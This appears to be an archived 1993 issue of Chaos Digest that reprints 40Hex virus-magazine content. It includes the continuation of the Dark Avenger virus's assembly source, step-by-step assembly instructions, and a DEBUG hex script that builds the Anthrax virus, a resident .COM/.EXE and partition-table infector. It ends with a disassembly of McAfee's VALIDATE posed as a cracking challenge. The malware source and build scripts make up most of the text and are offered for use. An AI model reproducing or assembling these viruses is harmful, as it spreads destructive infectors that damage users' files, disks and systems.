Copy Link
Add to Bookmark
Report

Chaos Digest Volume 01 Numero 37

eZine's profile picture
Published in 
Chaos Digest
 · 4 years ago

  

Chaos Digest Mercredi 26 Mai 1993 Volume 1 : Numero 37
ISSN 1244-4901

Editeur: Jean-Bernard Condat (jbcondat@attmail.com)
Archiviste: Yves-Marie Crabbe
Co-Redacteurs: Arnaud Bigare, Stephane Briere

TABLE DES MATIERES, #1.37 (26 Mai 1993)
File 1--40H VMag Issue 1 Volume 3 #002(2)-004(1) (reprint)

Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
available at no cost by sending a message to:
linux-activists-request@niksula.hut.fi
with a mail header or first line containing the following informations:
X-Mn-Admin: join CHAOS_DIGEST

The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299)
groups.

Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352)
466893. Back issues of ChaosD can be found on the Internet as part of the
Computer underground Digest archives. They're accessible using anonymous FTP:

* kragar.eff.org [192.88.144.4] in /pub/cud/chaos
* uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
* halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
* ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
* ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
* nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
* orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos

CHAOS DIGEST is an open forum dedicated to sharing French information among
computerists and to the presentation and debate of diverse views. ChaosD
material may be reprinted for non-profit as long as the source is cited.
Some authors do copyright their material, and they should be contacted for
reprint permission. Readers are encouraged to submit reasoned articles in
French, English or German languages relating to computer culture and
telecommunications. Articles are preferred to short responses. Please
avoid quoting previous posts unless absolutely necessary.

DISCLAIMER: The views represented herein do not necessarily represent
the views of the moderators. Chaos Digest contributors
assume all responsibility for ensuring that articles
submitted do not violate copyright protections.

----------------------------------------------------------------------

Date: Tue May 11 09:24:40 PDT 1993
From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. )
Subject: File 1--40H VMag Issue 1 Volume 3 #002(2)-004(1) (reprint)

[suite du listing de _Dark Avenger_ de ChaosD #1.35:]

; Check if the file is properly infected

see_sick:
sub dx,startup-copyright
sbb cx,0
mov ax,4200h
int 21h
add ax,offset top_file
adc dx,0
cmp ax,word ptr [top_save+18h]
jne see_fuck
cmp dx,word ptr [top_save+1ah]
jne see_fuck
mov dx,offset top_save+1ch
mov si,dx
mov cx,offset my_size
mov ah,3fh
int 21h
jc see_fuck
cmp cx,ax
jne see_fuck
xor di,di
next_byte:

lodsb
scasb
jne see_fuck
loop next_byte
stop_fuck_2:
ret
see_fuck:
xor cx,cx ;Seek to the end of file
xor dx,dx
mov ax,4202h
int 21h
cmp word ptr [top_save],5a4dh
je fuck_exe
add ax,offset aux_size+200h ;Watch out for too big .COM files
adc dx,0
je fuck_it
ret

;Pad .EXE files to paragraph boundary. This is absolutely unnecessary.

fuck_exe:
mov dx,word ptr [top_save+18h]
neg dl
and dx,0fh
xor cx,cx
mov ax,4201h
int 21h
mov word ptr [top_save+18h],ax
mov word ptr [top_save+1ah],dx
fuck_it:
mov ax,5700h ;Get file's date
int 21h
pushf
push cx
push dx
cmp word ptr [top_save],5a4dh
je exe_file ;Very clever, isn't it?
mov ax,100h
jmp short set_adr
exe_file:
mov ax,word ptr [top_save+14h]
mov dx,word ptr [top_save+16h]
set_adr:
mov di,offset call_adr
stosw
mov ax,dx
stosw
mov ax,word ptr [top_save+10h]
stosw
mov ax,word ptr [top_save+0eh]
stosw
mov si,offset top_save ;This offers the possibilities to
movsb ;some nasty programs to restore
movsw ;exactly the original length
xor dx,dx ;of the .EXE files
mov cx,offset top_file
mov ah,40h
int 21h ;Write the virus
jc go_no_fuck ;(don't trace here)
xor cx,ax
jnz go_no_fuck
mov dx,cx
mov ax,4200h
int 21h
cmp word ptr [top_save],5a4dh
je do_exe
mov byte ptr [top_save],0e9h
mov ax,word ptr [top_save+18h]
add ax,startup-copyright-3
mov word ptr [top_save+1],ax
mov cx,3
jmp short write_header
go_no_fuck:
jmp short no_fuck

;Construct the .EXE file's header

do_exe:
call mul_hdr
not ax
not dx
inc ax
jne calc_offs
inc dx
calc_offs:
add ax,word ptr [top_save+18h]
adc dx,word ptr [top_save+1ah]
mov cx,10h
div cx
mov word ptr [top_save+14h],startup-copyright
mov word ptr [top_save+16h],ax
add ax,(offset top_file-offset copyright-1)/16+1
mov word ptr [top_save+0eh],ax
mov word ptr [top_save+10h],100h
add word ptr [top_save+18h],offset top_file
adc word ptr [top_save+1ah],0
mov ax,word ptr [top_save+18h]
and ax,1ffh
mov word ptr [top_save+2],ax
pushf
mov ax,word ptr [top_save+19h]
shr byte ptr [top_save+1bh],1
rcr ax,1
popf
jz update_len
inc ax
update_len:
mov word ptr [top_save+4],ax
mov cx,18h
write_header:
mov dx,offset top_save
mov ah,40h
int 21h ;Write the file beginning
no_fuck:
pop dx
pop cx
popf
jc stop_fuck
mov ax,5701h ;Restore the original file date
int 21h
stop_fuck:
ret

;The following is used by the INT 21h and INT 27h handlers in connection
;to the program hiding in memory from those who don't need to see it.
;The whole system is absurde and meaningless and it is also another source
;for program conflicts.

alloc:
push ds
call get_chain
mov byte ptr ds:[0],'M'
pop ds

;Assures that the program is the first one in the processes,
;which have intercepted INT 21h (yet another source of conflicts).

ontop:
push ds
push ax
push bx
push dx
xor bx,bx
mov ds,bx
lds dx,ds:[21h*4]
cmp dx,offset int_21
jne search_segment
mov ax,ds
mov bx,cs
cmp ax,bx
je test_complete

;Searches the segment of the sucker who has intercepted INT 21h, in
;order to find where it has stored the old values and to replace them.
;Nothing is done for INT 27h.

xor bx,bx
search_segment:
mov ax,[bx]
cmp ax,offset int_21
jne search_next
mov ax,cs
cmp ax,[bx+2]
je got_him
search_next:
inc bx
jne search_segment
je return_control
got_him:
mov ax,word ptr cs:[save_int_21]
mov [bx],ax
mov ax,word ptr cs:[save_int_21+2]
mov [bx+2],ax
mov word ptr cs:[save_int_21],dx
mov word ptr cs:[save_int_21+2],ds
xor bx,bx

;Even if he has not saved them in the same segment, this won't help him.

return_control:
mov ds,bx
mov ds:[21h*4],offset int_21
mov ds:[21h*4+2],cs
test_complete:
pop dx
pop bx
pop ax
pop ds
ret

;Fetch the segment of the last MCB

get_chain:
push ax
push bx
mov ah,62h
call function
mov ax,cs
dec ax
dec bx
next_blk:
mov ds,bx
stc
adc bx,ds:[3]
cmp bx,ax
jc next_blk
pop bx
pop ax
ret

;Multiply by 16

mul_hdr:
mov ax,word ptr [top_save+8]
mul_16:
mov dx,10h
mul dx
ret

db 'This program was written in the city of Sofia '
db '(C) 1988-89 Dark Avenger',0

;INT 13h handler.
;Calls the original vectors in BIOS, if it's a writing call

int_13:
cmp ah,3
jnz subfn_ok
cmp dl,80h
jnc hdisk
db 0eah ;JMP XXXX:YYYY
my_size: ;--- Up to here comparison
disk: ; with the original is made
dd 0
hdisk:
db 0eah ;JMP XXXX:YYYY
fdisk:
dd 0
subfn_ok:
db 0eah ;JMP XXXX:YYYY
save_int_13:
dd 0
call_adr:
dd 100h

stack_pointer:
dd 0 ;The original value of SS:SP
my_save:
int 20h ;The original contents of the first
nop ;3 bytes of the file
top_file: ;--- Up to here the code is written
filehndl equ $ ; in the files
filename equ filehndl+2 ;Buffer for the name of the opened
file
save_int_27 equ filename+65 ;Original INT 27h vector
save_int_21 equ save_int_27+4 ;Original INT 21h vector
aux_size equ save_int_21+4 ;--- Up to here is moved into memory
top_save equ save_int_21+4 ;Beginning of the buffer, which
;contains
; - The first 24 bytes read from file
; - File length (4 bytes)
; - The last bytes of the file
; (my_size bytes)
top_bz equ top_save-copyright
my_bz equ my_size-copyright

code ends
end

------------------------------------------------------------------------------

A few notes on assembling this virus.

It's a little bit tricky assembling the Dark Avenger Virus. Use
these steps below. I use Turbo Assembler 2.0, but I'm positve that
MASM will work just as well.

1:
TASM AVENGER.ASM

2:
TLINK AVENGER.OBJ

3:
EXE2BIN AVENGER AVENGER.COM

Now make a 3 byte file named JUMP.TMP using DEBUG like this

4: DEBUG

n jmp.tmp
e 0100 E9 68 00

rcx
3
w
q

5: Now do this COPY JMP.TMP + AVENGER.COM DAVENGER.COM

There you have it....
HR
+++++

40Hex Issue 3 0003

Anthrax

Well, this is turning out to be a tribute issue to the Dark
Avenger. Here is another one of his better known viruses. This is
a nice one cause it not only is a file infector, but it is also a
sort of boot sector virus. It is also what I dubbed a reincarnation
virus, meaning that even if you clean your system of it, it may
still live, because it leaves a copy of itself on the last sector of
the disk. The virus can be reincarnated by the V2100 virus, also bu
The Dark Avenger.

Well, Patti Hoffman (one of my favorite people on earth, not) wrote
this virus up.

Aliases:
V Status: Rare [Not for long]
Discovery: July, 1990
Symptoms: .COM & .EXE growth
Origin: Bulgaria
Isolated: Netherlands
Eff Length: 1040 - 1279 Bytes
Type Code: PRAKX-Parasitic Resident .COM, .EXE, & Partition Table Infector
Detection Method: ViruScan V66+, Pro-Scan 2.01+, IBM Scan 2.00+
Removal Instructions: Scan/D + MDisk/P, Pro-Scan 2.01+
General Comments:

The Anthrax Virus was isolated in July 1990 in the Netherlands after
it was uploaded onto several BBSes in a trojan anti-viral program,
USCAN.ZIP. It is the second virus to be found in a copy of UScan
during July 1990, the first virus being V2100. Anthrax is a memory
resident generic infector of .COM and .EXE files, including
COMMAND.COM.

The first time a program infected with the Anthrax virus is executed
on the system's hard disk, the virus will infect the hard disk's
partition table. At this point, the virus is not memory resident. It
will also write a copy of itself on the last few sectors of the
system's hard disk. If data existed on those last few sectors of the
hard disk, it will be destroyed.

When the system is booted from the hard disk, the Anthrax virus
will install itself memory resident. It will remain memory resident
until the first program is executed. At that time, it will deinstall
itself from being resident and infect one .COM or .EXE file. This
virus does not infect files in the current directory first, but
instead starts to infect files at the lowest level of the disk's
directory tree.

Later, when an infected program is executed, Anthrax will infect one
.COM or .EXE file, searching the directory structure from the lowest
level of the directory tree. If the executed infected program
was located on the floppy drive, a .COM or .EXE file may or may not
be infected.

The Anthrax Virus's code is 1,024 bytes long, but infected programs
will increase in length by 1,040 to 1,279 bytes. On the author's test
system, the largest increase in length experienced was 1,232 bytes.
Infected files will always have an infected file length that is a
multiple of 16.

The following text strings can be found in files infected with the
Anthrax virus:

"(c)Damage, Inc."
"ANTHRAX"

A third text string occurs in the viral code, but it is in Cyrillics.
Per Vesselin Bontchev, this third string translates to: "Sofia 1990".

Since Anthrax infects the hard disk partition tables, infected systems
must have the partition table disinfected or rebuilt in order to
remove the virus. This disinfection can be done with either a low-
level format or use of the MDisk/P program for the correct DOS
version after powering off and rebooting from a write-protected boot
diskette for the system. Any .COM or .EXE files infected with
Anthrax must also be disinfected or erased. Since a copy of the virus
will exist on the last few sectors of the drive, these must also be
located and overwritten.

Anthrax interacts with another virus: V2100. If a system which was
previously infected with Anthrax should become infected with the V2100
virus, the V2100 virus will check the last few sectors of the hard
disk for the spare copy of Anthrax. If the spare copy is found, then
Anthrax will be copied to the hard disk's partition table.

It is not known if Anthrax carries any destructive capabilities or
trigger/activation dates.

Here is the actual virus. Well if this is your fist copy of
40Hex, let me explain how to compile it.

First copy what is below with your editor. Then save it to a file
called ANTHRAX.SCR. Then type at the command line -

DEBUG <ANTHRAX.SCR

This will create a file called ANTHRAX.COM, that's the actual virus.

----------------------------------------------------------------------------

n anthrax.com
e 0100 E9 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0110 95 8C C8 2D 00 00 BA 00 00 50 52 1E 33 C9 8E D9
e 0120 BE 4C 00 B8 CD 00 8C CA 87 44 44 87 54 46 52 50
e 0130 C4 1C B4 13 CD 2F 06 53 B4 13 CD 2F 58 5A 87 04
e 0140 87 54 02 52 50 51 56 A0 3F 04 A8 0F 75 6C 0E 07
e 0150 BA 80 00 B1 03 BB 77 06 B8 01 02 50 CD 13 58 B1
e 0160 01 BB 00 04 CD 13 0E 1F BE 9B 03 8B FB B9 5E 00
e 0170 56 F3 A6 5E 8B FB B9 62 00 56 F3 A4 5F BE 12 08
e 0180 B9 65 00 F3 A4 74 1E 89 4D E9 B1 5C 89 4D 9B 88
e 0190 6D DC B1 02 33 DB B8 02 03 CD 13 49 BB 00 04 B8
e 01A0 01 03 CD 13 49 B4 19 CD 21 50 B2 02 B4 0E CD 21
e 01B0 B7 02 E8 87 01 5A B4 0E CD 21 5E 1F 8F 04 8F 44
e 01C0 02 8F 44 44 8F 44 46 1F 1E 07 95 CB 28 63 29 20
e 01D0 44 61 6D 61 67 65 2C 20 49 6E 63 2E 00 B0 03 CF
e 01E0 06 1E 57 56 50 33 C0 8E D8 BE 86 00 0E 07 BF 08
e 01F0 06 FD AD AB A5 AF 87 F7 AD FC 74 11 1E 07 AF B8
e 0200 07 01 AB 8C C8 AB 8E D8 BF 68 00 A5 A5 58 5E 5F
e 0210 1F 07 2E FF 2E 00 06 06 1E 57 56 52 51 53 50 0E
e 0220 1F BE 06 06 33 C9 8E C1 BF 84 00 A5 A5 B4 52 CD
e 0230 21 26 8B 47 FE 8E D8 BB 03 00 03 07 40 8E D8 81
e 0240 07 80 00 0E 07 B7 12 E8 F2 00 58 5B 59 5A 5E 5F
e 0250 1F 07 2E FF 2E 06 06 C3 91 AE B4 A8 BF 20 31 39
e 0260 39 30 B8 00 3D CD 21 72 EE 93 B8 20 12 CD 2F 53
e 0270 26 8A 1D B8 16 12 CD 2F 5B BE 62 04 8B D6 B1 18
e 0280 B4 3F CD 21 33 C1 75 70 06 1F C6 45 02 02 33 D2
e 0290 EC 3C 10 72 FB 03 45 11 13 55 13 24 F0 3D 00 FB
e 02A0 73 56 89 45 15 89 55 17 0E 1F 50 B1 10 F7 F1 2B
e 02B0 44 08 8B C8 2B 44 16 A3 04 00 AD 35 4D 5A 74 03
e 02C0 35 17 17 9C 75 17 89 04 3B 44 0A 87 44 12 A3 07
e 02D0 00 89 4C 14 B9 DC 04 74 07 83 44 08 48 B9 65 00
e 02E0 51 B9 9B 03 B4 40 CD 21 33 C8 59 75 09 BA 00 04
e 02F0 B4 40 CD 21 33 C8 5A 58 75 38 26 89 4D 15 26 89
e 0300 4D 17 52 9D 75 18 26 8B 45 11 26 8B 55 13 B5 02
e 0310 F7 F1 85 D2 74 01 40 89 14 89 44 02 EB 0A C6 44
e 0320 FE E9 05 28 03 89 44 FF B9 18 00 8D 54 FE B4 40
e 0330 CD 21 26 80 4D 06 40 B4 3E CD 21 C3 8E D9 8A 1E
e 0340 6C 04 0E 1F FF 06 5E 04 BA 4B 06 E8 1F 00 BE 0A
e 0350 06 C6 04 5C 46 32 D2 B4 47 CD 21 BA 9B 03 B4 3B
e 0360 CD 21 E3 0D B4 51 CD 21 8E DB BA 80 00 B4 1A EB
e 0370 C8 72 3E BE 9C 03 32 D2 B4 47 CD 21 3A 2E DC 03
e 0380 B1 32 BA 9D 02 B4 4E 74 5C CD 21 72 24 BA 4B 06
e 0390 B8 01 4F BE DC 03 BF 68 06 AA B1 0D F3 A6 74 45
e 03A0 3A 6D FE 74 40 CD 21 73 E4 32 C0 EB D3 2A 2E 2A
e 03B0 00 B1 41 BF 9C 03 3A 2D 8A C5 A2 DC 03 74 69 F2
e 03C0 AE 4F B1 41 B0 5C FD F2 AE 8D 75 02 BF DC 03 FC
e 03D0 AC 84 C0 AA 75 FA BA CD 02 32 C9 EB 81 2E 2E 00
e 03E0 BA 4B 06 B4 4F CD 21 72 C8 BE 69 06 BF DC 03 80
e 03F0 3C 2E 74 EC 88 2D 8B D6 F6 44 F7 10 75 DB AC 84
e 0400 C0 AA 75 FA 4E FD AD AD FC 3D 58 45 74 05 3D 4F
e 0410 4D 75 CD 53 E8 4B FE 5B 33 C9 8E C1 26 A0 6C 04
e 0420 0E 07 2A C3 3A C7 72 B8 BA 80 00 B1 03 BB 00 02
e 0430 B8 01 03 CD 13 BA 0A 06 E9 23 FF 95 BF 00 01 8B
e 0440 5D 01 81 EB 28 02 8B C7 8D B7 FD 03 A5 A4 93 B1
e 0450 04 D3 E8 8C D9 03 C1 BA 0B 00 EB 71 B8 D0 00 FC
e 0460 87 85 68 FA AB 8C C8 E2 F7 A3 86 00 AB 8E D8 B4
e 0470 08 CD 13 49 49 A1 E9 03 84 E4 74 01 91 B2 80 B8
e 0480 03 03 CD 13 91 84 E4 75 02 2C 40 FE CC A3 E9 03
e 0490 FF 06 60 04 32 F6 B9 01 00 BB 00 04 B8 01 03 CD
e 04A0 13 8A D6 CB 41 4E 54 48 52 41 58 0E 1F 83 2E 13
e 04B0 04 02 CD 12 B1 06 D3 E0 8E C0 BF 00 04 BE 00 7C
e 04C0 B9 00 01 8B DE FC F3 A5 8E D8 BA 27 04 51 53 50
e 04D0 52 CB 8E C1 B1 04 BE B0 05 83 C6 0E AD 3C 80 74
e 04E0 04 E2 F6 CD 18 92 FD AD 91 B8 01 02 CD 13 81 3E
e 04F0 FE 05 55 AA 75 ED 06 1E 07 1F 32 F6 B9 02 00 33
e 0500 DB B8 02 02 CD 13 E9 EE FE 00 00 00 00 CD 20 CC
e 0510 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
e 0520 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
e 0530 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
e 0540 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
e 0550 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
e 0560 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
e 0570 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A

rcx
480
w
q

------------------------------------------------------------------------
HR
+++++

40Hex Issue 3 0004

The Strange Case of Validate

- Fall to your knees, begging your way out of this disease.

Well we all know what a dick John Mcafee is. Well with his product
SCAN comes a program VALIDATE. I noticed when I took a close look
at the internal workings of this program (while working on a little
revenge project) that there is text in the program. The strings
read

"Enter password now"
"Access denied"

Well this got me going, what is this??? Well this brings up our
first 40Hex challenge. I am including a dissassembly of validate.
Here it is:

----------------------------------------------------------------------------

data_1e equ 100h
data_2e equ 102h
data_3e equ 2Ch
data_4e equ 14h
data_5e equ 16h
data_6e equ 18h
data_7e equ 1Ah
data_8e equ 47h
data_9e equ 49h
data_10e equ 4Ah
data_11e equ 59h

seg_a segment byte public
assume cs:seg_a, ds:seg_a


org 100h

validate proc far

start:
jmp loc_96
db 0Dh, ' ', 0Dh, 0Ah, 'VALIDATE 0'
db '.3 '
copyright db 'Copyright 1988-89 by McAfee Asso'
db 'ciates.'
db ' (408) 988-3832', 0Dh, 0Ah, 0Dh
db 0Ah, 'Written by Dennis Yelle', 0Dh
db 0Ah, 0Dh, 0Ah
db 1Ah

data_19 db 30h dexed access)
db '123456789ABCDEF'
db 10h, 0Fh, 0Dh, 8, 6, 3
db 1, 0, 0C8h, 10h, 0Ch, 5
db 0, 0C8h, 10h, 0Fh, 2, 0
db 0C8h, 10h, 0Fh, 0Eh, 7, 6
db 0, 0C8h, 10h, 0Fh, 0Dh, 0
db 0C8h
loc_1:
mov al,1
mov ah,4Ch
int 21h
db 0CDh, 20h
loc_2:
jmp short loc_2

validate endp

sub_1 proc near
mov dx,si
loc_3:
lodsb
cmp al,1
ja loc_3
pushf
mov cx,si
sub cx,dx
dec cx
mov ah,40h
mov bx,1
int 21h
popf
jz loc_1
retn
sub_1 endp

sub_2 proc near
mov bp,sp
xchg si,[bp]
call sub_1
xchg si,[bp]
retn
sub_2 endp

db 0B4h, 40h, 0BBh, 2, 0, 0B9h
db 48h, 0, 0BAh, 9, 1, 0CDh
db 21h, 0A1h, 2, 0, 8Ch, 0CBh
db 29h, 0D8h, 3Dh, 0, 10h, 77h
db 52h, 0E8h, 0D8h, 0FFh
db 0Dh, 0Ah, ' Sorry, there is not e'
db 'nough memory available.', 0Dh, 0Ah
db ' I need 66000 bytes of RAM.', 0Dh
db 0Ah
db 1, 0BEh, 80h, 0, 0ACh, 0Ah
db 0C0h
db 74h, 9
loc_4:
lodsb
cmp al,20h
je loc_4
cmp al,0Dh
jne loc_6
loc_5:
jmp loc_10
loc_6:
dec si
mov data_33,si
push si
mov si,197h
call sub_9
mov di,666h
call sub_10
mov si,186h
call sub_9
mov di,866h
call sub_10
call sub_2
and [bx+si],ah
and [bx+si],ah
and [bx+si],ah
and [bx+si],ah
and [bx+si],ah
inc si
db 'ile Name: '
db 0, 5Eh
loc_7:
lodsb
cmp al,20h
jg loc_7
push ax
xor al,al
mov [si-1],al
mov bx,1
mov cx,si
dec cx
mov dx,data_33
sub cx,dx
mov ah,40h
int 21h
push si
call sub_8
mov dx,data_33
mov ax,3D00h
int 21h
jc loc_11
mov data_32,ax
;* call sub_3
db 0E8h, 0B8h, 0
mov ah,3Eh
mov bx,data_32
int 21h
pop si
pop ax
cmp al,0Dh
je loc_9
loc_8:
lodsb
cmp al,20h
je loc_8
cmp al,0Dh
je loc_9
call sub_8
jmp loc_6
loc_9:
mov ax,4C00h
int 21h
loc_10:
mov dx,2E6h
mov cx,84h
jmp loc_17
loc_11:
mov dx,5FBh
mov cx,29h
jmp loc_17
db 'This program prints the validati'
db 'on information for a file.', 0Dh
db 0Ah, 'Examples:', 0Dh, 0Ah, ' '
db ' VALIDATE SCAN.EXE', 0Dh, 0Ah
db ' VALIDATE SCANRES.EXE', 0Dh
db 0Ah
sub_3 proc near
xor ax,ax
mov data_34,ax
mov data_35,ax
loc_12:
mov bx,data_32
mov dx,0A66h
mov cx,8000h
mov ah,3Fh
int 21h
jnc loc_13
jmp loc_16
loc_13:
or ax,ax
jz loc_14
mov dx,ax
push dx
mov si,0A66h
mov di,666h
mov cx,data_34
call sub_11
mov data_34,cx
pop dx
mov si,0A66h
mov di,866h
mov cx,data_35
call sub_11
mov data_35,cx
jmp short loc_12
loc_14:
call sub_2
and [bx+si],ah
and [bx+si],ah
and [bx+si],ah
and [bx+si],ah
and [bx+si],ah
and [bx+si],ah
and [bx+si],ah
and [bp+di+69h],dl
jp $+67h
cmp ah,[bx+si]
and [bx+si],al
mov ax,4202h
mov bx,data_32
xor cx,cx
xor dx,dx
int 21h
jnc $+0Fh
call sub_2
jnz $+70h
db 6Bh, 6Eh, 6Fh, 77h, 6Eh, 0
db 0EBh, 3, 0E8h, 59h, 1, 0E8h
db 0D1h, 0FDh
db 0Dh, 0Ah, ' Date: '
db 0, 0B8h, 0, 57h, 8Bh, 1Eh
db 4Eh, 6, 0CDh, 21h, 73h, 8
db 0BEh, 0DDh, 3, 0E8h, 8Fh, 0FDh
db 0EBh, 26h, 52h, 8Bh, 0C2h, 0B1h
db 5, 0D3h, 0E8h, 25h, 0Fh, 0
db 0E8h, 70h, 1, 0E8h, 98h, 0
db 58h, 50h, 25h, 1Fh, 0, 0E8h
db 65h, 1, 0E8h, 8Dh, 0, 58h
db 0B1h, 9, 0D3h, 0E8h, 5, 0BCh
db 7, 0E8h, 57h, 1, 0E8h, 7Ch
db 0FDh
db 0Dh, 0Ah, 'File Authentication:', 0Dh
db 0Ah, ' Check Method 1 - '
db 0, 8Bh, 0Eh, 52h, 6, 0E8h
db 27h, 0, 0E8h, 43h, 0FDh
db 0Dh, 0Ah, ' Check Method 2 - '
db 0, 8Bh, 0Eh, 54h, 6, 0E8h
db 4, 0, 0E8h, 27h, 0, 0C3h
db 51h, 89h, 0C8h, 88h, 0E0h, 0E8h
db 1, 0
db 58h

------------------------------

End of Chaos Digest #1.37
************************************

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT